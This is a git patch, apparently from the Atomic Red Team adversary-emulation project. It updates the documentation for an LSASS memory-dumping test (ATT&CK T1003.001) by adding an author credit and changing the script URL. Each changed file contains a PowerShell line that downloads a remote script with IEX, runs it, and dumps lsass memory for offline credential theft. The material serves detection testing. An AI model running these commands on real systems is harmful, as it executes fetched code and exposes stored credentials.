From cb29aa596fa50bb0e7552e5a7477fff88b161489 Mon Sep 17 00:00:00 2001 From: Atomic Red Team doc generator Date: Wed, 31 May 2023 21:08:41 +0000 Subject: [PATCH] Generated docs from job=generate-docs branch=master [ci skip] --- atomics/Indexes/index.yaml | 4 +++- atomics/Indexes/windows-index.yaml | 4 +++- atomics/T1003.001/T1003.001.md | 4 +++- 3 files changed, 9 insertions(+), 3 deletions(-) diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml index fcd2b8c1..45068180 100644 --- a/atomics/Indexes/index.yaml +++ b/atomics/Indexes/index.yaml @@ -89123,12 +89123,14 @@ credential-access: The memory of lsass.exe is often dumped for offline credential theft attacks. This test leverages a pure powershell implementation that leverages the MiniDumpWriteDump Win32 API call. Upon successful execution, you should see the following file created $env:SYSTEMROOT\System32\lsass_*.dmp. + + Author of Out-Minidump: Matthew Graeber (@mattifestation) supported_platforms: - windows executor: command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 - IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Out-Minidump.ps1'); get-process lsass | Out-Minidump + IEX (New-Object Net.WebClient).DownloadString('https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1003.001/src/Out-Minidump.ps1'); get-process lsass | Out-Minidump cleanup_command: 'Remove-Item $env:TEMP\lsass_*.dmp -ErrorAction Ignore ' diff --git a/atomics/Indexes/windows-index.yaml b/atomics/Indexes/windows-index.yaml index 09f6f50c..9d004675 100644 --- a/atomics/Indexes/windows-index.yaml +++ b/atomics/Indexes/windows-index.yaml @@ -77382,12 +77382,14 @@ credential-access: The memory of lsass.exe is often dumped for offline credential theft attacks. This test leverages a pure powershell implementation that leverages the MiniDumpWriteDump Win32 API call. Upon successful execution, you should see the following file created $env:SYSTEMROOT\System32\lsass_*.dmp. + + Author of Out-Minidump: Matthew Graeber (@mattifestation) supported_platforms: - windows executor: command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 - IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Out-Minidump.ps1'); get-process lsass | Out-Minidump + IEX (New-Object Net.WebClient).DownloadString('https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1003.001/src/Out-Minidump.ps1'); get-process lsass | Out-Minidump cleanup_command: 'Remove-Item $env:TEMP\lsass_*.dmp -ErrorAction Ignore ' diff --git a/atomics/T1003.001/T1003.001.md b/atomics/T1003.001/T1003.001.md index 065f71b8..209fdcc7 100644 --- a/atomics/T1003.001/T1003.001.md +++ b/atomics/T1003.001/T1003.001.md @@ -420,6 +420,8 @@ The memory of lsass.exe is often dumped for offline credential theft attacks. Th powershell implementation that leverages the MiniDumpWriteDump Win32 API call. Upon successful execution, you should see the following file created $env:SYSTEMROOT\System32\lsass_*.dmp. +Author of Out-Minidump: Matthew Graeber (@mattifestation) + **Supported Platforms:** Windows @@ -435,7 +437,7 @@ Upon successful execution, you should see the following file created $env:SYSTEM ```powershell [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 -IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Out-Minidump.ps1'); get-process lsass | Out-Minidump +IEX (New-Object Net.WebClient).DownloadString('https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1003.001/src/Out-Minidump.ps1'); get-process lsass | Out-Minidump ``` #### Cleanup Commands: